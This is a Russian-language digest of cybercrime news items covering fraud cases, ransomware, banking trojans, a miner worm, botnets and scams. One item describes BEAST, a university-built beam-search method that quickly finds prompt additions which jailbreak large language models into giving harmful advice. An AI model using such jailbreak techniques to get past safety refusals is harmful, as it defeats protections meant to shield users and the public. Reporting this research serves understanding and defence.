Основатель популярного криптовалютного стартапа BitClout, Нейдер Аль-Наджи, столкнулся с обвинениями SEC в мошенничестве и незаконном предложении ценных бумаг. Аль-Наджи использовал псевдоним, чтобы скрыться от регуляторов, сумев привлечь более $257 миллионов в криптовалюте.
Децентрализованная социальная платформа BitClout получила финансирование от известных фирм, таких как a16z, Sequoia, Social Capital, Coinbase Ventures и Winklevoss Capital. В посевном раунде компания привлекла около $7 миллионов.
По данным SEC, Аль-Наджи, известный как DiamondHands, уверял инвесторов, что средства от продажи токенов BTCLT не будут использованы для выплат ему или сотрудникам. Однако Аль-Наджи потратил более $7 миллионов на личные нужды, включая покупку особняка в Беверли-Хиллз и подарки для семьи. Источник, близкий к Аль-Наджи, заявил, что особняк использовался для деловых целей.
BitClout с самого начала вызывал споры. В 2021 году платформа позволяла пользователям покупать и продавать токены, основанные на репутации людей. Компания скопировала профили 15 000 пользователей Twitter* без их разрешения и привязала к ним токены, что вызвало критику и юридические проблемы. Сооснователь Rio Network Брэндон Кертис потребовал прекратить использование его образа без согласия. Бывший премьер-министр Сингапура Ли Сянь Лун попросил удалить свой профиль, заявив, что он был создан без разрешения.
Многие инвесторы поддержали BitClout из-за репутации Аль-Наджи, заработанной после его предыдущего проекта Basis. В 2018 году Аль-Наджи привлек $140 миллионов для создания стейблкоина, но вернул деньги инвесторам из-за неблагоприятной регуляторной среды. По словам человека, близкого к Аль-Наджи, инвесторы получили обратно около $0.93 на $1.
В начале 2021 года Аль-Наджи привлек финансирование для BitClout, но вскоре протестировал функцию фондового рынка, что вызвало недовольство среди некоторых инвесторов. В итоге компания сосредоточилась на блокчейне DeSo, предназначенном для децентрализации соцсетей.
Однако многие технологические лидеры защищали BitClout. Некоторые инвесторы вложили тысячи долларов в покупку токенов. Инвесторам нравилась система мотивации пользователей финансовыми наградами, а также «преобразовательное видение» Аль-Наджи.
Скрытая личность Аль-Наджи является ключевым аспектом жалобы SEC. Комиссия утверждает, что основатель BitClout создавал впечатление, будто за BitClout не стоит компания, а лишь «монеты и код», тогда как на самом деле Аль-Наджи зарабатывал миллионы долларов. Отмечается, что Аль-Наджи пытался уклониться от федеральных законов о ценных бумагах и обмануть инвесторов.
Аль-Наджи пока не прокомментировал обвинения, но ранее выражал уверенность в законности своего стартапа. Он рассказал, как изучал законы о ценных бумагах и криптовалютах, потратив $10 миллионов на юристов.
sec.gov/newsroom/press-releases/2024-91
В муниципалитетах Кабо Руч и Торревьеха в провинции Аликанте, а также в Лос Уррутиас (Картахена) задержали группу из десяти человек, которые подозреваются в мошенничестве с задействованием поддельных DNI.
По версии следствия, арестованные применяли фальшивые документы с целью подписания договоров с телекоммуникационными компаниями и оформления кредитных карт.
В полиции также заявили, что аферисты корректировали фотографии на оригинальных DNI, а затем использовали в корыстных целях.
Отмечается, что во время обысков была изъята документация с инструкциями по получению личной информации обманным путем и USB-накопитель с изображениями оригинальных DNI и их измененных версий, сделанных при помощи компьютерных программ. Кроме того, правоохранители нашли перечень людей с указанием их банковских счетов и суммы остатков на них.
Арестованными оказались четверо мужчин в возрасте от 20 до 46 лет, которые в ближайшее время предстанут перед судом Ориуэлы. Остальные шестеро злоумышленников — это люди, предоставившие свои персональные данные для мошенничества.
Следователи выяснили, что в группировке была построена многоуровневая структура. Так, ее главарь контролировал все операции и решал, какой вид мошенничества будет использован в каждом конкретном случае. Низшей ступенью в банде считались люди, предоставлявшие персональные данные.
laopiniondemurcia.es/sucesos/2024/07/17/desarticulado-entramado-cartagena- alicante-dni-falsos-105752120.html
Прокурор Кобринского района санкционировал применение меры пресечения в виде заключения под стражу в отношении 20-летнего иностранного гражданина – ему инкриминировано хищение имущества путем модификации компьютерной информации группой лиц по предварительному сговору.
Согласно материалам уголовного дела обвиняемый в июне 2024 года вступил в преступное сообщество и получил информацию об алгоритме действий для хищения чужого имущества. В частности, в группе с иным лицом он разместил в сети Интернет «фишинговые» ресурсы, имитирующие официальный интернет-ресурс одного из банков страны. В размещенной информации содержалась онлайн-форма для анкетирования якобы от имени банка, за прохождение которого «полагалась» выплата денежного вознаграждения. После ввода гражданами банковских реквизитов обвиняемый привязывал счета потерпевших к мобильному приложению на своем телефоне.
Проведенные манипуляции позволили ему похитить более 5 тыс. рублей со счетов трех потерпевших.
Действия обвиняемого квалифицированы по ч.2 ст.212 Уголовного кодекса Республики Беларусь.
Уголовное дело находится в производстве Кобринского районного отдела Следственного комитета.
Прокурор санкционировал применение названной меры пресечения с учетом обстоятельств преступления, его тяжести и общественной опасности.
27-летний житель американского Буффало (штат Нью-Йорк) признал себя виновным в покупке устройств несанкционированного доступа (скорее всего, имеются в виду украденные данные кредитных карт) на площадке Genesis Market. Как сообщили в Министерстве юстиции США, Вул Исаак Чол может отправиться за решетку на срок до 10 лет за трату всего лишь 105 долларов.
«Покупки, совершавшиеся на Genesis Market, оплачивались криптовалютами. В период с июня 2019 года по январь 2021 года Чол внес биткойны на сумму около 105,08 доллара на созданный им счет на Genesis. Эти средства были использованы для приобретения 21 пакета, в которых содержались 778 устройств несанкционированного доступа», — говорится в заявлении Минюста.
Не исключено, что полученные таким образом персональные данные американцев были использованы для мошенничества с получением пособий. Во всяком случае, сам Чол признал себя виновным в получении 25,2 тысячи долларов от Департамента труда штата Нью-Йорк. Теперь ему грозит максимальное наказание в размере 10 лет лишения свободы, а также штраф в 250 тысяч долларов.
Окончательный приговор будет вынесен 13 сентября.
justice[.]gov/usao-wdny/pr/buffalo-man-pleads-guilty-buying-stolen-data- genesis-market
Канадский суд приговорил к двум годам тюремного заключения мужчину, который признался в распространении программ-вымогателей и совершении вредоносных атак на частных лиц, предприятия и правительственные учреждения.
33-летний Мэтью Филберт в октябре прошлого года признал себя виновным по обвинениям в мошенничестве и несанкционированном доступе к компьютерам после своего ареста в 2021 году в Канаде. Всего следователи обнаружили более 1100 жертв, столкнувшихся с противозаконными действиями Филберта.
При вынесении приговора в пятницу в Суде Онтарио прокуроры отметили, что атаки Филберта иногда приводили к потере пострадавшими тысяч долларов, включая один инцидент, в ходе которого было украдено более 10 000 долларов из семейного бизнеса.
Среди других целей были три канадских полицейских управления и даже детский благотворительный фонд «Дом Рональда Макдональда» в Галифаксе, Новая Шотландия.
Проживающий в Оттаве Филберт был схвачен после расследования с участием полиции Онтарио и бюро ФБР в Анкоридже, Аляска. В то время федеральный суд Аляски уже вынес против Филберта отдельное обвинительное заключение.
В американском деле утверждалось, что Филберт «пытался нанести несанкционированный ущерб защищённому компьютеру, принадлежащему штату Аляска» в 2018 году, попутно затронув медицинские данные сотрудников.
Излюбленным методом атаки Филберта были фишинговые электронные письма с документами, которые выглядели как резюме, но на самом деле содержали вредоносное ПО, позволяющее полностью контролировать компьютер жертвы.
Личности многочисленных сообщников Филберта пока не установлены, но работы в этом направлении ведётся как американскими, так и канадскими правоохранителями.
• Source: https://www.cbc.ca/lite/story/1.7096493
Среди десятков тысяч покупателей RAT-трояна оказались насильники.
30 июля Федеральная полиция Австралии (AFP) предъявило обвинения 24-летнему австралийцу за разработку и продажу трояна Imminent Monitor RAT , который использовался для удаленного слежения за пользователями. По словам AFP, разработчик продал ПО более 14 500 человек в 128 странах.
«Часть покупателей IM RAT в Австралии (14,2%) являются ответчиками по делам о домашнем насилии. Кроме того, один из покупателей зарегистрирован в Реестре сексуальных преступников среди детей. Из 14 человек 11 купили RAT в период действия их приказа о домашнем насилии (domestic violence order, DVO)
Правоохранительные органы утверждают, что с момента начала кампании в 2013 году разработчик заработал от $300 000 до $400 000, которые в основном использовались для оплаты доставки еды и покупки «расходных материалов». Австралийцу грозит 6 обвинений с максимальным наказанием 20 лет.
Программа начала продаваться на хакерских форумах и специальном веб-сайте как инструмент удаленного администрирования ( Remote Administration Tool, RAT ), который можно было приобрести за $25 за пожизненную лицензию, в которую входила техподдержка клиентов.
Напомним, что в 2019 году в рамках скоординированной международной операции Европол обезвредил киберпреступную сеть, занимавшуюся распространением Imminent Monitor RAT. Была обезврежена инфраструктура, а также отключен веб- сайт Imminent Monitor.
source: afp.gov.au/news-media/media-releases/afp-charges-man-creating-global- spyware-tool
FIN7 создает свою программу-вымогатель для всего киберпреступного сообщества
Группировка FIN7 перешла на использование RaaS-модели, поскольку это оказалось прибыльным для большинства хакеров. Исследователи кибербезопасности из Mandiant обнаружили , что FIN7 до недавнего времени использовался для финансирования операций, связанных с REvil , DarkSide , BlackMatter и BlackCat . Но теперь группа намерена разработать собственный вариант программы- вымогателя.
Предполагается, что FIN7 стояла за атакой на Colonial Pipeline в 2021 году, что привело к нехватке топлива на востоке США. Также по словам ФБР , участники FIN7 являются высококвалифицированными хакерами, которые финансируются Кремлем.
По данным правоохранителей, с 2013 по 2018 годы FIN7 атаковала более 100 компаний и организаций на территории США, взломав тысячи различных систем. Сообщалось, что только в США хакеры похитили свыше 15 млн. платежных карт, скомпрометировав более 6500 PoS-терминалов. Затем эти данные перепродавались в даркнете третьим лицам.
source: mandiant.com/resources/evolution-of-fin7
На портале «Госуслуг» появилась возможность получения электронного сертификата безопасности. Уточняется, что им можно заменить зарубежный сертификат безопасности для сайта, если тот будет отозван или закончится срок его действия.
Минцифры РФ с помощью «Госуслуг» предоставляет полностью бесплатный отечественный TLS-сертификат. Заказать его могут только юридические лица, являющиеся владельцами сайтов. Выдача сертификата осуществляется в течение 5 дней после отправки запроса.
**Сотрудник криптобиржи скачал фильм с вредоносом, позволив хакеру украсть $7 млн
Злоумышленники потратили около шести месяцев на анализ деятельности биржи, прежде чем совершить кражу.**
Сотрудник криптовалютной биржи 2gether оказался виновным в краже $7 млн у компании. Он скачал пиратский фильм, в котором была скрыта вредоносная программа. Вредонос проник в системы биржи и позволил хакеру похитить более $7 млн в BTC и ETH.
Как сообщается в официальном заявлении испанской полиции, команда Департамента киберпреступлений арестовала пять человек, подозреваемых во взломе.
Хотя расследование и аресты состоялись на этой неделе, атака на мадридский стартап 2gether, специализирующийся на покупке, продаже и хранении криптовалюты, произошла в конце июля 2020 года. В ходе операции под названием 3Coin полиция обнаружила, что злоумышленники использовали компьютерный вирус типа троян удаленного доступа (RAT) для доступа к внутренней сети 2gether. Хотя сотрудник предоставил хакерам доступ к сети компании, злоумышленники потратили около шести месяцев на анализ деятельности биржи, прежде чем совершить кражу.
«Как только они узнали все процедуры, характеристики и структуру компании, хакеры получили доступ к системе, используя подключенную компьютерную сеть, чтобы инициировать перевод активов на подконтрольный им кошелек», — говорится в заявлении полиции.
В ходе расследования компьютеров компании полиции удалось установить оператора web-сайта, который управлял вредоносным ПО. Впоследствии следователи нашли еще четырех человек, которым предположительно досталась часть украденных криптовалют.
Взлом 2gether затронул около 5,5 тыс. пользователей, торгующих на платформе. Компании пришлось столкнуться с несколькими жалобами от пострадавших и даже с попыткой коллективного иска.
В Америке уроженец Китая создал мошенническую схему, благодаря которой нанес ущерб корпорации Apple на $1 млн. Он сдавал в гарантийный ремонт поддельные айфоны, получая вместо них оригинальные гаджеты, сообщает ресурс 9to5mac с ссылкой на Министерство юстиции США.
32-летний Хайтенг Ву иммигрировал в США в 2013 году, приехав учиться на инженера. Получив степень магистра в 2015 году, он устроился на легальную работу, после чего начал готовиться к воплощению своих плана по выманиванию денег у Apple. Следствие установило, что к своей афере Ву готовился около 3,5 лет.
На родине аферист приобрел крупную партию высококачественных китайских айфонов-подделок, которые на вид невозможно было отличить от оригиналов. С помощью специального программного обеспечения в аппараты прошивались серийные номера и номера IMEI настоящих айфонов, находящихся на гарантии. После этого Ву делал так, что операционную систему смартфона невозможно было включить. С подготовленными таким образом аппаратами мошенник обращался в гарантийный сервис Apple. При подключении такого телефона к компьютеру мастера на экране отображалось сообщение о том, что девайс находится на гарантии.
Таким образом китаец сумел обменять гаджетов на сумму в $1 млн. Однако, воспользоваться этими деньгами предприимчивый инженер не успел — его арестовали. При вынесении приговора суд учел, что Ву находился под стражей в течение более, чем 2 лет пока длилось следствие. Ему засчитали этот срок в качестве наказания и присудили выплатить штраф и компенсацию Apple на общую сумму $2 млн. Жену инженера, которая помогала ему в незаконной деятельности, приговорили к пяти месяцам заключения.
В середине ноября в сети Биткоина было активировано обновление Taproot. Однако Binance, как оказалось, не поддерживает новые адреса формата bc1p и пользователь биржи потерял BTC при попытке вывода.
На форуме StackExchange пользователь [написал](https://bitcoin.stackexchange.com/questions/111440/is-it-possible- to-convert-a-taproot-address-into-a-native-segwit-address), что при выводе средств указал адрес в формате bc1p. Система проверила адрес и продолжила процесс вывода, даже предоставила идентификатор транзакции. Однако, когда средства не пришли, пользователь проверил транзакцию и обнаружил, что адрес для вывода был заменен на совершенно новый, в формате bc1q (Segwit).
Оказалось, что при выводе система Binance автоматически «сконвертировала» адрес кошелька в поддерживаемый формат и отправила биткоины туда. Конечно, доступа к данному кошельку у пользователя нет, поэтому средства, по сути, были потеряны. К счастью, сумма не так велика – пользователь лишился около $7 000 в BTC. На текущий момент информации о компенсации со стороны Binance нет.
Интересно, что еще до активации обновления Taproot представители биржи написали, что площадка будет полностью поддерживать все функции обновления. Похоже, что вывод на адреса нового формата не был проверен, что и привело к потере средств. Как написал разработчик Питер Вюлле (Pieter Wuille), биткоины вернуть не получится:
«Боюсь, монеты были сожжены. Адреса формата P2TR кодируют открытый ключ, а адреса P2WSH кодируют хэш скрипта. Использовать адреса P2TR в качестве адресов P2WSH невозможно, это бы сломало все шифрование SHA-256. Это не Ваша вина и Вы должны требовать свои средства назад. У адресов P2TR, как и у любых других, есть контрольная сумма и алгоритм ее подсчета изменился с обновлением Taproot. Тот факт, что они вообще приняли этот адрес, говорит о том, что сотрудники на стороне отправителя крайне некомпетентны».
Атака произошла после того, как компания отказалась возмещать клиентам расходы на оплату выкупа вымогателям.
Отделение французской транснациональной страховой компании AXA в Азии подверглось атаке с использованием программы-вымогателя Avaddon. Атака произошла после того, как 9 мая нынешнего года компания сообщила об отказе продавать программы киберстрахования во Франции, которые возмещают клиентам расходы на оплату выкупа вымогателям.
Как сообщило информагентство Reuters, инцидент затронул IT-услуги отделения Asia Assistance в Таиланде, Малайзии, Гонконге и на Филиппинах.
«Киберпреступники получили доступ к определенным данным, обработанным Inter Partners Asia (IPA) в Таиланде», — сообщили в AXA.
По словам операторов Avaddon, они украли 3 ТБ данных, включая удостоверения личности, копии паспортов, претензии клиентов, зарезервированные соглашения, сведения об отказах в возмещении средств, платежи клиентам, контракты и отчеты, идентификаторы клиентов и отсканированные документы банковских счетов, медицинские данные о различных заболеваниях.
В качестве доказательства хищения данных киберпреступники предоставили копии двух паспортов — тайского и британского. Требуемая сумма выкупа не разглашается. Если компания AXA не пойдет на встречу хакерам, вымогатели опубликуют похищенные данные.
Вредонос маскируется под мультимедийные приложения, такие как TeaTV, VLC Media Player, DHL и UPS.
Исследователи в области кибербезопасности из компании Cleafy выявили банковский троян для Android-устройств, способный похищать учетные данные пользователей и SMS-сообщения. Преступники атакуют пользователей банковских приложений в Испании, Германии, Италии, Бельгии и Нидерландах.
Вредоносное ПО, получившее название TeaBot (также известное как Anatsa), находится на ранней стадии разработки. Первые признаки активности TeaBot были замечены в январе нынешнего года, однако кибератаки против пользователей финансовых программ последовали в конце марта.
«Основная цель операторов TeaBot — кража учетных данных и SMS-сообщений жертв для реализации сценариев мошенничества с заранее определенным списком банков. После успешной установки TeaBot на устройство жертвы злоумышленники могут получить прямую трансляцию экрана, а также взаимодействовать с ним через службу специальных возможностей Android Accessibility Service», — пояснили эксперты.
Мошенническое приложение для Android маскируется под службы доставки мультимедиа и пакетов, такие как TeaTV, VLC Media Player, DHL и UPS, и выполняет роль загрузчика, также вынуждая жертву предоставить ему необходимые разрешения.
TeaBot способен выполнять следующие функции на скомпрометированном устройстве: фиксировать нажатия клавиш, делать снимки экрана и внедрять вредоносные оверлеи поверх экранов входа в банковские приложения для кражи учетных данных и данных кредитной карты.
TeaBot также может отключать Google Play Protect, перехватывать SMS-сообщения и получать доступ к кодам двухфакторной аутентификации (2FA Google Authenticator). Похищенные сведения отправляются каждые 10 секунд на удаленный сервер, управляемый злоумышленником.
Речь идет о 34-летних Александре Гричишкине и Андрее Скворцове.
Россияне Александр Гричишкин (34 года), его ровесник Андрей Скворцов, а также 33-летний уроженец Литвы Александр Скородумов и 30-летний гражданин Эстонии Павел Стасси в американском суде будут отвечать за помощь в организации хакерских атак. Каждому из них грозит до 20 лет колонии.
По версии следствия, с 2008 по 2015 год обвиняемые предоставляли услуги хостинга, использовавшегося киберпреступниками для распространения вредоносных программ и атак на финансовые учреждения и граждан США. Таким образом, обвиняемые помогали своим клиентам избежать обнаружения правоохранительными органами.
В расследовании этих преступлений принимали участие ФБР и правоохранительные органы Великобритании, Эстонии и Германии. Злоумышленники признали свою вину в феврале и марте 2021 года. Приговоры им будут вынесены 3 июня, 29 июня, 8 июля и 16 сентября. По этому обвинению преступникам грозит максимальный срок заключения в 20 лет.
Ранее Российский гражданин Сергей Медведев приговорен судом в Неваде к 10 годам лишения свободы за совершение киберпреступлений в составе группы, ущерб от которых составил $568 млн. Минюст США назвал Сергея Медведева одним из лидеров интернет-площадки с девизом «в мошенничество мы верим» (In Fraud We Trust): организации, которая занималась покупкой, продажей и распространением похищенных идентификационных данных, скомпрометированных банковских карт, личной, финансовой и банковской информации, а также вредоносных компьютерных программ.
Группировка N3tw0rm, атаковавшая израильские компании, предположительно связана с иранскими операторами вымогательского ПО Pay2Key.
Иранская киберпреступная группировка N3tw0rm атаковала компьютерные сети израильского отделения международной сети одежды H&M и угрожает обнародовать данные о клиентах. Об этом сообщила израильская газета Haaretz.
Хакеры угрожают опубликовать 110 ГБ данных H&M Israel, если требования не будут выполнены.
Хакеры также сообщили о взломе компьютерных систем израильской компании Veritas Logistics. Преступники похитили 9 ГБ информации клиентов компании.
В связи с атаками национальное агентство по кибербезопасности Израиля выступило с предостережением и распространило информацию, позволяющую учреждениям распознавать хакеров и предпринимать меры с целью защиты. По мнению Рафаэля Франко, занимавшего в прошлом должность заместителя главы агентства, инциденты могут быть преддверием серии хакерских атак, приуроченных к иранскому «Дню Иерусалима».
Эксперты полагают, что N3tw0rm связана с иранскими операторами вымогательского ПО Pay2Key, которые в прошлом году заявили о взломе Israel Aerospace Industries и израильской ИБ-компании Portnox.
По словам специалистов, иранские киберпреступники выдают себя за русских. Они атакуют израильские фирмы, участвующие в цепочке поставок. Взлом этих компаний, которые предоставляют услуги большому количеству других фирм, позволит получить доступ к множеству жертв. Преступники в основном мотивированы политически. Злоумышленники требуют выкуп, но в ходе переговоров становится ясно, что у них нет реального намерения разглашать данные.
Разработчики мессенджера для обмена зашифрованными сообщениями UseCrypt Messenger подали иск против польского ИБ-исследователя Томаша Зелински (Tomasz Zieliński), редактора блога Informatyk Zakładowy. Дело в том, что осенью 2020 года Зелински опубликовал в блоге [статью](https://informatykzakladowy.pl/bo- do-komunikatora-trzeba-dwojga/), в которой рассказал об уязвимости в механизме приглашения пользователей.
[](https://xakep.ru/wp- content/uploads/2021/04/345413/autofwd.png)
Исследователь обнаружил, что в некоторых случаях, когда пользователи UseCrypt Messenger хотят пригласить друга в приложение, оно использует небезопасный домен (autofwd.com) для рассылки таких инвайтов. К тому же, помимо работы через HTTP, сайт AutoFWD.com был уязвим и для SQL-инъекций и XSS, что позволяло любому желающему захватить сайт, а затем прочитать или подделать приглашения.
Хотя осенью разработчики сайта AutoFWD.com признали, что исследователь прав, а в итоге вообще закрыли ресурс, теперь Зелински вскоре получил опровержение от V440 SA, юридического лица, стоящего за созданием UseCrypt Messenger.
В своем сообщении компания утверждала, что исследование специалиста содержало «ложную информацию». V440 SA заявила, что их приложение не использует AutoFWD.com для обработки приглашений, а вместо этого полагается на собственное решение, размещенное на get.usecryptmessenger.com.
Зелински пишет, что разработчики UseCrypt лукавят: уже после публикации его исследования они тихо внесли исправления в мессенджер, удалив AutoFWD.com из механизма обработки приглашений. Теперь же они пытаются все опровергнуть, хотя эксперт заранее уведомил компанию о проблемах и придерживался принятых в таких случаях правил.
Ситуация окончательно обострилась в марте 2021 года, когда Зелински сообщил в Twitter, что V440 SA подала на него в суд и теперь пытается заставить удалить статью.
__https://twitter.com/x/status/1371215603931959305
По информации местного новостного ресурса Puls Biznesu, V440 SA также подала иски против двух других польских ИТ-блогов ([Niebezpiecznik](https://niebezpiecznik.pl/post/oswiadczenie-w-sprawie- wymierzonej-w-niebezpiecznika-i-inne-redakcje-kampanii-oszczerstw/) и Zaufana Trzecia Strona), утверждая, что они и Informatyk Zakładowy являются «организованной преступной группой» и были в сговоре.
Авторы блогов выпустили совместное заявление ([1](https://informatykzakladowy.pl/oswiadczenie-redaktora-naczelnego-po- artykule-w-pulsie-biznesu/), [2](https://niebezpiecznik.pl/post/oswiadczenie- w-sprawie-wymierzonej-w-niebezpiecznika-i-inne-redakcje-kampanii-oszczerstw/), [3](https://zaufanatrzeciastrona.pl/post/oswiadczenie-redakcji-w-sprawie- wymierzonej-w-nas-kampanii-oszczerstw/)), в котором рассказывают, что компания просто пытается запугать их и подвергнут цензуре, вынудив удалить неугодные ей материалы о UseCrypt Messenger.
«Запросы на удаление статей, требования извинений и другие послания от юридических фирм, адресованные нашим редакторам, не заставят нас перестать интересоваться тем или иным вопросом», — заявляют исследователи.
Click to expand...
Источник: xakep.ru/2021/04/08/usecrypt-messenger/
Специалисты Cisco Talos обнаружили обновленную версию трояна Masslogger, который сейчас в основном атакует пользователей из Турции, Латвии и Италии, расширяя географию своей активности. Дело в том, в конце 2020 года малварь была нацелена на пользователей в Испании, Болгарии, Литве, Венгрии, Эстонии и Румынии, но похоже цели вредоноса теперь меняются почти ежемесячно.
Masslogger предназначен для кражи учетных данных, а также является кейлоггером (в этой версии трояна данная функциональность, похоже, отключена). Он способен воровать данные через SMTP, FTP или HTTP. И если для первых двух вариантов дополнительных серверных компонентов не требуется, то хищение через HTTP осуществляется посредством веб-приложения в панели управления малварью.
В настоящее время вредонос похищает учтенные данные из Discord, Microsoft Outlook, Mozilla Thunderbird, NordVPN, FileZilla, Pidgin, FoxMail, Firefox, QQ Browser и браузеров на базе Chromium (Chrome, Chromium, Edge, Opera, Brave).
Впервые Masslogger был замечен экспертами еще в апреле 2020 года, но теперь значительно изменился. Новейший Masslogger распространяется через фишинговые письма и заключен в многотомный архив RAR. Малварь использует формат .chm и расширения .r00, что особенно заинтересовало экспертов.
«CHM — это скомпилированный HTML-файл, содержащий встроенный HTML-файл с кодом JavaScript для запуска процесса заражения. Каждая стадия заражения сильно обфусцирована, чтобы избегать обнаружения с использованием простых сигнатур», — рассказывают специалисты, упоминая, что такой формат файлов обычно используется в работе справки Windows.
Click to expand...

Если открыть вредоносное вложение и .chm, появится фейковое окно помощи, и
сработает пейлоад
В конечном итоге все это приводит к развертыванию скрипта PowerShell, который содержит непосредственно загрузчик Masslogger. Загрузчик обычно размещается на взломанных легитимных хостах, а имя файла, как правило, содержит одну букву и оду цифру с расширением .jpg. Например, «D9.jpg».
Общая
схема атаки
При этом эксперты подчеркивают, что малварь почти полностью выполняется и присутствует только в памяти. Единственный компонент на диске — это почтовое вложение и скомпилированный HTML-файл.
Источник: xakep.ru/2021/02/19/new-masslogger/
Разработчики менеджера паролей LastPass объявили о грядущих изменениях в работе сервиса. Со следующего месяца бесплатную учетную запись нельзя будет одновременно использовать на нескольких типах устройств (компьютерах и мобильных).
Так, начиная с 16 марта 2021 года, бесплатные пользователи должны будут выбрать между использованием LastPass на мобильных устройствах (включая смартфоны, умные часы и планшеты) и использованием на компьютерах (включая все браузеры, работающие на десктопах и ноутбуках). Изменить свое решение можно будет трижды, после этого тип используемых устройств зафиксируется окончательно, и парольный менеджер будет работать лишь с выбранным типом девайсов.
Компания сообщает, что вынуждена пойти на такой шаг, чтобы «адаптировать свои предложения и идти в ногу с постоянно развивающимся цифровым миром». Разработчики не говорят о том, что разделение необходимо по техническим причинам. Просто очевидно, что бесплатные пользователи, которые работают как с ПК, так и мобильными устройствами, заинтересованы в сервисе больше других, а значит, они будут готовы заплатить за LastPass 2,25 долларов в месяц.
Также в заявлении компании сказано, что с 17 мая 2021 года поддержка по электронной почте будет доступна только для клиентов с подписками Premium и Families.
Источник: xakep.ru/2021/02/17/lastpass-device-type/
Компания Palo Alto Networks сообщает, что хакерская группировка Rocke использует новую майнинговую малварь Pro-Ocean для атак на уязвимые установки Apache ActiveMQ, Oracle WebLogic и Redis.
Напомню, что Rocke была обнаружена экспертами Cisco Talos еще далеким летом 2018 года. Основным направлением работы группы всегда был майнинг криптовалюты Monero, и мы рассказывали о том, как хакеры конкурировали с другими злоумышленниками за контроль над уязвимыми серверами.
Теперь эксперты пишут, что Rocke по-прежнему не изменяет своей привычке атаковать облачные приложения и эксплуатировать различные известные уязвимости для захвата контроля над непропатченными серверами Oracle WebLogic (CVE-2017-10271), Apache ActiveMQ (CVE-2016-3088) и небезопасными установками Redis.
Архитектура малвари
Обнаруженная аналитиками малварь Pro-Ocean содержит «новые и улучшенные» возможности, лежащие в области руткитов и червей. Эти функции позволяют Pro- Ocean эффективно скрывать свою вредоносную активность.
К примеру, чтобы оставаться незамеченной, Pro-Ocean использует функцию Linux LD_PRELOAD, которая помогает приоритизировать загрузку определенных библиотек, а также библиотеку Libprocesshider.
Как было замечено выше, Pro-Ocean обладает потенциалом червя, и реализовано такое распространение малвари весьма просто. Специальный Python-скрипт использует общедоступный IP-адрес зараженной машины и службу identity.me, а затем пытается заразить любые доступные машины, находящиеся в той же 16-битной подсети. При этом малварь не старается как-то отсортировать потенциальных жертв и просто пытается применить эксплоиты к любым обнаруженным хостам в надежде, что один из них сработает. В случае успеха скрипт доставляет в систему полезную нагрузку, которая, в свою очередь, загружает скрипт для установки для Pro-Ocean с удаленного HTTP-сервера.

Этот написанный на Bash и обфусцированный установочный скрипт играет важную роль в операциях Rocke. Дело в том, что помимо доставки на зараженный хост малвари Pro-Ocean, он же устраняет конкурентов, удаляя любые вредоносы и майнеры, уже присутствующие в системе. Кроме того, скрипт предоставляет Pro- Ocean полный доступ, удаляя iptables Firewall и любые агенты мониторинга, которые могут заметить атаку и понять тревогу.

Так как майнинг Monero – по-прежнему приоритетная задача хакеров, Pro-Ocean поставляется со специальным модулем, который следит за использованием ЦП и ликвидирует любые легитимные процессы, если те загружают процессор более чем на 30%. Этот же модуль регулярно проверяет, активен ли майнер и перезапускает его, если что-то пошло не так.
Исследователи предупреждают, что пока малварь использует лишь две уязвимости, но в будущем их количество может увеличиться, если авторы малвари решат нацелить Pro-Ocean на другие облачные приложения и серверы. Пока же специалисты уверены, что главными целями для атак Pro-Ocean являются облачные сервисы Alibaba и Tencent.
Источник: xakep.ru/2021/02/02/pro-ocean/
63-летнюю пенсионерку из Москвы развели от имени популярного 37-летнего южнокорейского певца Ким Хён-джуна. Женщина общалась с мошенником около двух лет, пишет телеграм-канал SHOT.
Женщина рассказала, что познакомилась с мужчиной, который представился южнокорейским айдолом, в 2022 году в одном из чатов, пока лежала в больнице. Все это время они общались по-дружески и переписывались по электронной почте. По словам пенсионерки, "айдол" даже звонил ей по Скайпу, она разговаривала с ним и его семьей. Более того, он якобы передавал ей деньги через неких российских туристов — 25 тыс. рублей на ремонт машины и 15 тыс. на подарок дочке. В феврале этого года "певец" сообщил женщине, что его аккаунты взломали, а затем внезапно признался в любви. Он сказал, что отправил женщине посылку с дорогостоящими подарками - телефоном, брендовой сумочкой и сапогами.
"Транспортная компания" взяла с москвички 50 тысяч рублей за доставку, затем попросила еще денег. Тогда пенсионерка, так и не увидевшая гостинцев от знаменитого кавалера, догадалась, что что-то не так, и пошла в полицию.
Исследователи из университета Мэриленда (UMD) разработали новую атаку, позволяющую злоумышленнику обойти запреты для большой языковой модели (БЯМ, LLM). Метод BEAST отличает высокая скорость: благоразумного ассистента можно заставить выдать вредный совет всего за минуту.
Во избежание злоупотреблений разработчики коммерческих ИИ-ботов обычно вводят на сервисах ограничения и учат LLM различать провокации и реагировать на них вежливым отказом. Однако оказалось, что такие преграды можно обойти, придав правильную формулировку запросу-стимулу.
Поскольку обучающие наборы данных неодинаковы, найти нужную фразу для снятия запрета конкретной БЯМ непросто. Для автоматизации подбора и добавления таких ключей к стимулам (например, «меня попросили проверить защищенность сайта») был создан ряд градиентных PoC-атак, но джейлбрейк в этом случае занимает больше часа.
Чтобы ускорить процесс, в UMD создали экспериментальную установку на базе GPU Nvidia RTX A6000 с 48 ГБ памяти и написали особую программу (исходники скоро станут доступными на GitHub). Софт проводит лучевой поиск по обучающему набору AdvBench Harmful Behaviors и скармливает LLM неприемлемые с точки зрения этики стимулы, а затем по алгоритму определяет слова и знаки пунктуации, провоцирующие проблемный вывод.
Использование GPU позволило сократить время генерации пробных стимулов до одной минуты, при этом на одной из контрольных LM-моделей BEAST показал эффективность 89% — против максимум 46% у градиентных аналогов. Ускорение в сравнении с ними составило от 25 до 65%.
С помощью BEAST, по словам авторов, можно также усилить галлюцинации LLM. Тестирование показало, что количество неверных ответов при этом увеличивается примерно на 20%.
Телевизоры под ударом — ботнет «Bigpanzi» заразил более 170 000 умных телевизоров и ТВ-приставок.
Пекинская компания «Qianxin Xlabs» предупредила, что хак-группа «Bigpanzi» c 2015 года заражает малварью телевизоры на «Android» и приставки на «eCos» по всему миру. Считается, что в настоящее время группировка контролирует крупный ботнет, насчитывающий около 170 000 ежедневно активных устройств.
Известно, что «Bigpanzi» заражает устройства через обновления прошивки или приложения, которые пользователи сами устанавливают на свои устройства. Об этом еще осенью 2023 года рассказывали аналитики компании «Доктор Веб», которые отслеживают эту угрозу под идентификатором «Android.Pandora».
Хакеры монетизируют зараженные устройства, превращая их в узлы для нелегальных стриминговых платформ, проксирования трафика, DDoS-атак и OTT-контента.
